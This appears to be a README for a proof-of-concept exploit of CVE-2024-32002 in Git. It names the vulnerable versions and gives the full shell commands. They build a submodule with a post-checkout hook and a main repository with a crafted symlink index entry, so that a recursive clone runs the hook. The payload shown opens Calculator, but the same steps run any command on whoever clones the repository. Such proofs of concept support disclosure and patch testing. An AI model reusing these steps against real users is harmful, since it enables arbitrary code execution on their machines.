A simple proof-of-concept that executes Calculator (macOS example only). When using git clone --recursive command, this repo will also pull https://github.com/markuta/hooky, which contains a post-checkout script. Mostly based on the commit fix t7406-submodule-update.sh file.
Note: Versions prior to
2.45.1,2.44.1,2.43.4,2.42.2,2.41.1,2.40.2, and2.39.4are vulnerable.
git clone --recursive github.com/markuta/CVE-2024-32002
# Submodule repo (payload)
git init hooky
cd hooky
mkdir -p y/hooks
echo "open -a Calculator.app" > y/hooks/post-checkout
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m post-checkout
hook_repo_path="$(pwd)"
# Main repo
git init captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m add-submodule
printf .git >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m add-symlink
More info about the vulnerability can be found here and here.